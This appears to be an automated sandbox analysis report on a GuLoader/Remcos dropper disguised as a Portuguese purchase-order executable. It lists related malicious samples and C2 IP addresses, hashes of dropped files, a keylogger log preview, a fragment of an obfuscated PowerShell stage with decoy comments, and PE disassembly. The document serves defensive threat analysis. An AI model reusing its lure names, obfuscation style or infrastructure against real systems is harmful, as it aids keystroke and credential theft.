ATOM86-AS ATOM86 (NL) | AWB DOCUMENT.vbs | malicious | GuLoader, Remcos | 178.237.33.50
ATOM86-AS ATOM86 (NL) | https://acrobat.adobe.com/id/urn:aaid:sc:VA6C2:24e81d17-b801-4fad-ae25-120d655923c5 | malicious | Remcos | 178.237.33.50
ATOM86-AS ATOM86 (NL) | XY2I8rWLkM.exe | malicious | Remcos, DBatLoader | 178.237.33.50
ATOM86-AS ATOM86 (NL) | 2020.xls | malicious | Remcos, DBatLoader | 178.237.33.50
ATOM86-AS ATOM86 (NL) | dhl_doc_awb_shipping_invoice_18_04_2024_000000000000024.vbs | malicious | GuLoader, Remcos | 178.237.33.50
ATOM86-AS ATOM86 (NL) | tu.exe | malicious | Remcos | 178.237.33.50
ATOM86-AS ATOM86 (NL) | RFQ.NO. S70-23Q-1474-CS-P.vbs | malicious | Remcos, GuLoader | 178.237.33.50
                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
Associated Sample Name / URL: 37f463bf4616ecd445d4a1937da06e19file.exe, Detection: malicious, Threat Name: Vidar
• 104.21.60.38
Associated Sample Name / URL: Copy of Poseidon Marine 4th monthly Stores Apr 2024 R3 .xls.vbs, Detection: malicious, Threat Name: AgentTesla, GuLoader
• 104.21.60.38
Associated Sample Name / URL: eOU2MVDmTd.exe, Detection: malicious, Threat Name: CredGrabber, Meduza Stealer, PureLog Stealer, zgRAT
• 104.21.60.38
Associated Sample Name / URL: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, Detection: malicious, Threat Name: CobaltStrike
• 104.21.60.38
Associated Sample Name / URL: UMMAN #U0130HRACAT AFR5641 910-1714 1633.exe, Detection: malicious, Threat Name: GuLoader, Remcos
• 104.21.60.38
Associated Sample Name / URL: SecuriteInfo.com.Trojan.DownLoader40.42214.8350.4072.exe, Detection: malicious, Threat Name: Unknown
• 104.21.60.38
Associated Sample Name / URL: SecuriteInfo.com.Trojan.DownLoader40.42214.8350.4072.exe, Detection: malicious, Threat Name: Unknown
• 104.21.60.38
Associated Sample Name / URL: POTWIERDZENIE_TRANSAKCJI_20240418145856.exe, Detection: malicious, Threat Name: GuLoader
• 104.21.60.38
Associated Sample Name / URL: eInvoicing_pdf.vbs, Detection: malicious, Threat Name: FormBook
• 104.21.60.38
Associated Sample Name / URL: SecuriteInfo.com.Program.Unwanted.5412.9308.3353.exe, Detection: malicious, Threat Name: PureLog Stealer
• 104.21.60.38
                                                                                            No context
                                                                                            Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                            File Type:JSON data
                                                                                            Category:dropped
                                                                                            Size (bytes):963
                                                                                            Entropy (8bit):4.995620093649274
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:tklzTknd6CsGkMyGWKyGXPVGArwY3+8aIHrGIArpv/mOAaNO+ao9W7iN5zzkw7Rr:qlkdRNuKyGX855vXhNlT3/77Kdxtro
                                                                                            MD5:334018F02CE31BCBB4864D602B557FE5
                                                                                            SHA1:C6DE43E8D6B5C026C0B0A56A898A3F00B282B881
                                                                                            SHA-256:F70CE925C3923E25A5ADB7089E7EE752E771FBD073888ABFC426138C9094F1B3
                                                                                            SHA-512:31EF486A2F75226594BC553CBAFA84B645B6ED456F35F363C8EFD6229F4A731981CA1B7736CD4BD739DDCA885F068E96692BB16C7A906314B52220DC63E318BB
                                                                                            Malicious:false
                                                                                            Reputation:moderate, very likely benign file
                                                                                            Preview:{. "geoplugin_request":"81.181.57.52",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"Marietta",. "geoplugin_region":"Georgia",. "geoplugin_regionCode":"GA",. "geoplugin_regionName":"Georgia",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"524",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"34.0414",. "geoplugin_longitude":"-84.5053",. "geoplugin_locationAccuracyRadius":"1000",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:modified
                                                                                            Size (bytes):8003
                                                                                            Entropy (8bit):4.838950934453595
                                                                                            Encrypted:false
                                                                                            SSDEEP:192:Dxoe5nVsm5emdiVFn3eGOVpN6K3bkkjo5agkjDt4iWN3yBGHB9smMdcU6CDpOeik:N+VoGIpN6KQkj2xkjh4iUxeLib4J
                                                                                            MD5:4C24412D4F060F4632C0BD68CC9ECB54
                                                                                            SHA1:3856F6E5CCFF8080EC0DBAC6C25DD8A5E18205DF
                                                                                            SHA-256:411F07FE2630E87835E434D00DC55E581BA38ECA0C2025913FB80066B2FFF2CE
                                                                                            SHA-512:6538B1A33BF4234E20D156A87C1D5A4D281EFD9A5670A97D61E3A4D0697D5FFE37493B490C2E68F0D9A1FD0A615D0B2729D170008B3C15FA1DD6CAADDE985A1C
                                                                                            Malicious:false
                                                                                            Preview:PSMODULECACHE.....$7o..z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$7o..z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                            Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                            File Type:Extensible storage engine DataBase, version 0x620, checksum 0x6eec0579, page size 32768, DirtyShutdown, Windows version 10.0
                                                                                            Category:dropped
                                                                                            Size (bytes):15728640
                                                                                            Entropy (8bit):0.10805027086476268
                                                                                            Encrypted:false
                                                                                            SSDEEP:1536:+SB2jpSB2jFSjlK/Qw/ZweshzbOlqVqmesAzbIBl73esleszO/Z4zbU/L:+a6aOUueqVRIBYvOU
                                                                                            MD5:9F6FBA8CABF6D4ECDD5B285F375D352B
                                                                                            SHA1:ED0D370573441F24C1FEF0F1D7A92DB58AA484D8
                                                                                            SHA-256:4C764E2DF9F41B915772A2259A958DB29E6476693225882D1FBAE286C22AFB41
                                                                                            SHA-512:75C78BF6271DBDFE3A044ADF75F84AF49867E63BD614F0A300A676A73A736432C16C2DA686177B01E01BE6018178CCD060FB009DA012AD876BFD632833046A0C
                                                                                            Malicious:false
                                                                                            Preview:n..y... ...................':...{........................Z.....9....{S......{w.h.\.........................-.1.':...{..........................................................................................................eJ......n........................................................................................................... .......':...{..............................................................................................................................................................................................,....{...................................H......{w.................2.G......{w..........................#......h.\.....................................................................................................................................................................................................................................................................................................................................................
                                                                                            Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                            File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):2
                                                                                            Entropy (8bit):1.0
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Qn:Qn
                                                                                            MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                            SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                            SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                            SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                            Malicious:false
                                                                                            Preview:..
                                                                                            Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):246
                                                                                            Entropy (8bit):3.341937514109179
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:6l+F8slHql55YcIeeDAlKe5q1gWAAe5q1gWAv:6l/slHUec8e5BWFe5BW+
                                                                                            MD5:B0BE059CD617302352CC046F6CC0220A
                                                                                            SHA1:06CF6C6B151EE7C8808C2AF6D177C3C0A3896980
                                                                                            SHA-256:60EFD41700D8318D03BEE12AC80FFCDA030EF4131A4CDD2B220FE5897EC65D2D
                                                                                            SHA-512:E53FA0FD6447D0F2BBAFDC7A007C36627E3AB200540C12EB85F7AB82B1DBA59ADBF037D432C403A83B38EDFA45533779F92A920351B14A382434F96EC7E3B13A
                                                                                            Malicious:true
                                                                                            Yara Hits:
                                                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\Users\user\AppData\Roaming\mqerms.dat, Author: Joe Security
                                                                                            Preview:....[.2.0.2.4./.0.4./.1.9. .1.9.:.1.2.:.1.0. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].....[.W.i.n.].r.....[.R.u.n.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....[.W.i.n.].r.....[.R.u.n.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....
                                                                                            Process:C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):338559
                                                                                            Entropy (8bit):7.6756920287623895
                                                                                            Encrypted:false
                                                                                            SSDEEP:6144:I/ZImUfg//jtgN5B76EjlzSejH9nT+6zHItGazPLRtXhu3:ITj/xgN5B5jl3jH9nT+6TuGQVRhu3
                                                                                            MD5:FBA02C5C2E2B17B589D84B7D57D7A736
                                                                                            SHA1:251A31C2E3BCB544CE6431FCA1E14F4ACEF7FF42
                                                                                            SHA-256:274533CE689D15C8EE6611FEB429118E821E28010FD79FC57F055C0B7E0E7FF6
                                                                                            SHA-512:25C4B0532A4113899BE97CF62407948867670157470178607626193D34EB7EEE54C2DB72CA5D1ABCB560A4341526DE92A958A4D09102B942D0811C74ED67F09E
                                                                                            Malicious:false
                                                                                            Preview:..........r..>.....qqq......................R..................!!......w..........l................F.III........................................aa........................|....................................................S.............jjj....-................................mm.M.b........F...pp.........00........QQ..............@@@.......8888.................E.N.;;....g..............................g.UU........................6.K....mmm....................................................BB...].........Z..........A...66.............YYY........AA.hhh..................GGG...............555....XXXXXX..w.........!.....h.................6...Q.}}}.............P....................xxx........FFFF..........""".........>......... .... ........NN.ZZZ.[.N..........E..................TT......HH...........................J..:..+..........zz.....vv................((((...##..............................................................66.....o.....................KK.0......x......;...9.......].????..
                                                                                            Process:C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):1089
                                                                                            Entropy (8bit):4.741939006979892
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:HE9gSo1DFGgLzDlcBo5AW02oIypXdMUKI:k9EThzOBo5Ar2ovSI
                                                                                            MD5:A5A3506D7A85C6A0834F9C3D27FCE6C9
                                                                                            SHA1:DC5600F7CCD5CAF8A924B70C2F45C1D7969F0E6B
                                                                                            SHA-256:6329AFA66841B081B1479BBF17BE5A6DAB5863E736093DA1398CCB4FD48C56EC
                                                                                            SHA-512:608B83DC77C28C663A9108B4F935E6DB82D470FA0392BD30FE9F7DC94E57D1BFAA5749F8ED3E489DD138FD12A2A6CBC488699660E0BFA7F24A1BD66DDAC1A1FB
                                                                                            Malicious:false
                                                                                            Preview:..............c.................O)D.3.b............2.....N.....H...1.X..-..."<............bl.......5......W.........W.....O..M.....>......m.....d...............C........-f................ ..p.F.~.....se....,...........c.T(....P.8..$.....n..:.....b...'T..g..............,.....1.W........T.>.i..V...8.....L...z...U..U......Q....h..g.........................(.2...-%....0..?......P..........w.x....D...............[...........r.....S....(..............F\....I.........0..."............#...?.^O..&~...w}.$..i........\...p....6e.....n....&.N....................t......i.....1......]...............r...........2.$L3..F..................,....V...Q..c.....;................c.................fw.......&....;......*....{.f....................~.............@...................v......}.;...\......).......c.xU...M_&..........w....9.Bn.I.....................X).........qE.,...H.../......J....~...y.+.0..............6...Q.T._.....{.>........r.^........U...........f.N......g.....H.....I\....e.[..........${
                                                                                            Process:C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exe
                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):501
                                                                                            Entropy (8bit):4.228739463953974
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:uHfW+5O384CuCatmRJ+8zBDg7epfF4HzZ/0d6Z9ya3Bl1SF9hm:u++5Ok7XwLep9kzZ89a3Jyhm
                                                                                            MD5:368D84FCACBE7199AAD3FD09C7DF14A7
                                                                                            SHA1:A5CA69A9DB10AFF8E8B7069B1800B8555B841C4D
                                                                                            SHA-256:8BFFAB9063FF62AD2BE0622F70C9608FC039FCB4A4B1917081BD90ADC5C36935
                                                                                            SHA-512:9E27DBB488E00F1690086B6C1D28E1EEBFE4C1415A7A218DE93BAF210BAA26D7D8C484273AE51D269403B844C11C37832349204FAA1F7CB139585B9F7E26878E
                                                                                            Malicious:false
                                                                                            Preview:cyclical canakin flebotomy subcandidness intervalhalveringernes noncelebration dicaryon compsothlypidae gastritissen..jasigerens quadroons rubinens stemmeberettiget glimrede udkoksede,farvellets mesenteriolum statsskove gennemsgningerne frtidspensionisters investeringsskema rendezvouser tilbagekbet underfactor barnesprog..tyndtflydenhed faradmeter enepiger youngers maddle,sildefangsts sportshals climatal diakritiske.byggestenen omplantedes uninstructedly saluterende mennonist identitetsantagelse.
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                            Category:dropped
                                                                                            Size (bytes):533858
                                                                                            Entropy (8bit):7.5110798850016085
                                                                                            Encrypted:false
                                                                                            SSDEEP:12288:fzA/ggggjrBj93vPbk8tGtP7ocMzAGrP+jp:U/ggggj9jpvY84mAGrPu
                                                                                            MD5:0E1262A4CE5AC71AD5B8DF93030D61B5
                                                                                            SHA1:EFB918EE62FF5CCA7BDC10D180C7F7837C8E2B6B
                                                                                            SHA-256:A90C7B4223BCA6A28296894C66845DE8FB61E7028B9C45AB8E0EC7D27DB0BF71
                                                                                            SHA-512:A799094BDAE022E92F77C002DC03D0DA004982AAA973EFE35DC6E72E40A5E9549927C7A831331218BB15478F24CC0B7ED9E7D94A0D1F3ABA103B49E68BD0064D
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                            • Antivirus: ReversingLabs, Detection: 58%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1..P...P...P..*_...P...P..OP..*_...P..s...P...V...P..Rich.P..........PE..L....z.W.................d...........2............@.......................................@..........................................@..............................................................................................................text...{c.......d.................. ..`.rdata...............h..............@..@.data...............~..............@....ndata.......P...........................rsrc.......@......................@..@................................................................................................................................................................................................................................................................................................................................................................
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 26
Entropy (8bit): 3.95006375643621
Encrypted: false
SSDEEP: 3:ggPYV:rPYV
MD5: 187F488E27DB4AF347237FE461A079AD
SHA1: 6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256: 255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512: 89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious: false
Preview: [ZoneTransfer]....ZoneId=0

Process: C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exe
File Type: BS image, Version -29696, Quantization -30208, (Decompresses to 153 words)
Category: dropped
Size (bytes): 4056
Entropy (8bit): 4.860550085125353
Encrypted: false
SSDEEP: 96:prxhfa2NwGYhNj+RR6UclY+w7RXMru7+AdWrY9NaR95:pr/lNChNy7cCtRcS2eI95
MD5: 4E679D550C231C35094FEFB645F0D0B4
SHA1: 26E9E728DCDA9CE0A9427DE64A8365DDB24090E2
SHA-256: 3FCA5795690F2D6553CA5845BF9B122051AB8B7C05896078541A14DE00FB6BD7
SHA-512: E0380BE7BED7AB78208FA0694FEDD3F5512BC6DDA0C29C3895DB4E6F814FC719DCFE933D1EC871B75FBD7B436C2C57BB0FCF9ACFB64E171C01C022B36F73F4BA
Malicious: false

Process: C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exe
File Type: data
Category: dropped
Size (bytes): 4996
Entropy (8bit): 4.9612676235687445
Encrypted: false
SSDEEP: 96:v48YsRVEpylVQratXvDeUeYSi80KFuwczSfTS48Bacs/OMRK2BL0Ab:v4XsRVCr0b/80KFuwNnA8OMRK2R0Ab
MD5: 3BF82F450A0DFD86F29536257623E2AD
SHA1: 286877538EC1D1D41A9819596B41B0289509CB51
SHA-256: 614BB44D24BBB3B890649867E13FB15D86E5EA73179FD44E716B10FFCAA3C7C0
SHA-512: 8B4CAD6568B4503E6E4171D22B8DB89E54449BF98D28C0D4D9F207AAAF56005E3406C8160A8365037F36CC4A7E4C537455ED6632371E2104CB718EC18C13D3CB
Malicious: false

Process: C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exe
File Type: ASCII text, with very long lines (61111), with no line terminators
Category: dropped
Size (bytes): 61111
Entropy (8bit): 5.357134631016563
Encrypted: false
SSDEEP: 1536:oKohIDhrU/xqIsVWUQ7IQp0lYmDc+m4PsrHLc:oJhI5U/xKWLpwon4Ps7Lc
MD5: 867B6E69EAF64D49C92A00EFE2F3484A
SHA1: 57E409C3C4EC17F05DE4B6900300C6FFB22447C7
SHA-256: 554A9D36104F6FE2C57EBEF379F96ADB5205F4652780C0459DB40E676F5EFA1C
SHA-512: 3D075D6850562B2F68503E48F9349A50DCF65E69626B85B5312BF0BD6938B3B433CAFB3ED4F885B392C4157B6997613EA551729A35028F5BE1151AC3FEDA1856
Malicious: true
Preview: $Myelopathy=$Cantabrigian;<#Snedkre Unintelligently Yengeese Heirless Aktiviteternes Hetmanship Unvizarded #><#Truppenes Forjttendes Aspargessuppernes #><#Irrepressibleness Nebulisations Brndstofledningerne Kretid Amt Bjrnekloers Fygningers #><#Oho Saddelpladsens Kakler Permittxjr #><#Anyway furmente Cirkle Krematorier Orients Cpu Ultraenthusiastic #><#Footpaths ingredience Stoppende Ventriloquous #><#prioriteringerne Overretssagfrernes Throbless Licorne #><#Brobyvrk Troskabslfterne ldigste #><#Rekvirenters Incredulousness Swordstick #><#Blastoporic Storebroderens Comprehends Mearstone Civilingenirens #><#Uroende Fraseringens Sportsstrmpers Antioxygen Innerwing Overprsidents #><#Sensibiliserende Brahmanens Kitsas #><#Vaporiferousness Testprocedurernes Carvings #><#Signposts Supratonsillar Vgtfyldes privatiseringen Kviltningers Butyrousness Vaduz #><#Whitehearted Routings Propan Botilde #><#mademoiselle Sanemonens Rnkesmed #><#Lovrevisioners Diadrom Transistor Chechia Humeroscapular Thi

File type: PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit): 7.5110798850016085
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: z14Novospedidosdecompra_Profil_4903.exe
File size: 533'858 bytes
MD5: 0e1262a4ce5ac71ad5b8df93030d61b5
SHA1: efb918ee62ff5cca7bdc10d180c7f7837c8e2b6b
SHA256: a90c7b4223bca6a28296894c66845de8fb61e7028b9c45ab8e0ec7d27db0bf71
SHA512: a799094bdae022e92f77c002dc03d0da004982aaa973efe35dc6e72e40a5e9549927c7a831331218bb15478f24cc0b7ed9e7d94a0d1f3aba103b49e68bd0064d
SSDEEP: 12288:fzA/ggggjrBj93vPbk8tGtP7ocMzAGrP+jp:U/ggggj9jpvY84mAGrPu
TLSH: 5FB4E1ABEB908526D93807B4E973C1181B749C963E71DF4F07897460AFF738238A9617
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...P...P...P..*_...P...P..OP..*_...P...s...P...V...P..Rich.P..........PE..L....z.W.................d...........2............@
Icon Hash: 82aea280f0fcfc75
Entrypoint: 0x4032a0
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp: 0x57017AB6 [Sun Apr 3 20:19:02 2016 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: e2a592076b17ef8bfb48b7e03965a3fc

Instruction
sub esp, 000002D4h
push ebx
push esi
push edi
push 00000020h
pop edi
xor ebx, ebx
push 00008001h
mov dword ptr [esp+14h], ebx
mov dword ptr [esp+10h], 0040A2E0h
mov dword ptr [esp+1Ch], ebx
call dword ptr [004080B0h]
call dword ptr [004080ACh]
cmp ax, 00000006h
je 00007FF9C91B8023h
push ebx
call 00007FF9C91BB164h
cmp eax, ebx
je 00007FF9C91B8019h
push 00000C00h
call eax
mov esi, 004082B8h
push esi
call 00007FF9C91BB0DEh
push esi
call dword ptr [0040815Ch]
lea esi, dword ptr [esi+eax+01h]
cmp byte ptr [esi], 00000000h
jne 00007FF9C91B7FFCh
push ebp
push 00000009h
call 00007FF9C91BB136h
push 00000007h
call 00007FF9C91BB12Fh
mov dword ptr [00434EE4h], eax
call dword ptr [0040803Ch]
push ebx
call dword ptr [004082A4h]
mov dword ptr [00434F98h], eax
push ebx
lea eax, dword ptr [esp+34h]
push 000002B4h
push eax
push ebx
push 0042B208h
call dword ptr [00408188h]
push 0040A2C8h
push 00433EE0h
call 00007FF9C91BAD18h
call dword ptr [004080A8h]
mov ebp, 0043F000h
push eax
push ebp
call 00007FF9C91BAD06h
push ebx
call dword ptr [00408174h]
add word ptr [eax], 0000h

Programming Language:
• [EXP] VC++ 6.0 SP5 build 8804

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8610 | 0xa0 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x54000 | 0x283d0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x2b4 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x637b | 0x6400 | 967d0e18ece4b8dcc63ec9d544660136 | False | 0.671484375 | data | 6.484796945043301 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x8000 | 0x14b0 | 0x1600 | d6b0bc2db2de2a3dd996fda6539cef0e | False | 0.4401633522727273 | data | 5.033673390997287 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xa000 | 0x2afd8 | 0x600 | 2aa587c909999ca52be17d0f1ffbd186 | False | 0.5188802083333334 | data | 4.039551377217298 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata | 0x35000 | 0x1f000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x54000 | 0x283d0 | 0x28400 | 1ae715fef83c68eac2d6a2aa7a20fec2 | False | 0.28579313858695654 | data | 5.764915315933482 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x54358 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 67584 | English | United States | 0.20579971607713238
RT_ICON | 0x64b80 | 0x94a8 | Device independent bitmap graphic, 96 x 192 x 32, image size 38016 | English | United States | 0.3141948707168383
RT_ICON | 0x6e028 | 0x5488 | Device independent bitmap graphic, 72 x 144 x 32, image size 21600 | English | United States | 0.34639556377079483
RT_ICON | 0x734b0 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16896 | English | United States | 0.31737128011336796
RT_ICON | 0x776d8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.42022821576763486
RT_ICON | 0x79c80 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.46083489681050654
RT_ICON | 0x7ad28 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | English | United States | 0.5704918032786885
RT_ICON | 0x7b6b0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.6108156028368794
RT_DIALOG | 0x7bb18 | 0x100 | data | English | United States | 0.5234375
RT_DIALOG | 0x7bc18 | 0x11c | data | English | United States | 0.6056338028169014
RT_DIALOG | 0x7bd38 | 0xc4 | data | English | United States | 0.5918367346938775
RT_DIALOG | 0x7be00 | 0x60 | data | English | United States | 0.7291666666666666
RT_GROUP_ICON | 0x7be60 | 0x76 | data | English | United States | 0.7542372881355932
RT_VERSION | 0x7bed8 | 0x1b8 | COM executable for DOS | English | United States | 0.5295454545454545
RT_MANIFEST | 0x7c090 | 0x340 | XML 1.0 document, ASCII text, with very long lines (832), with no line terminators | English | United States | 0.5540865384615384

DLL | Import
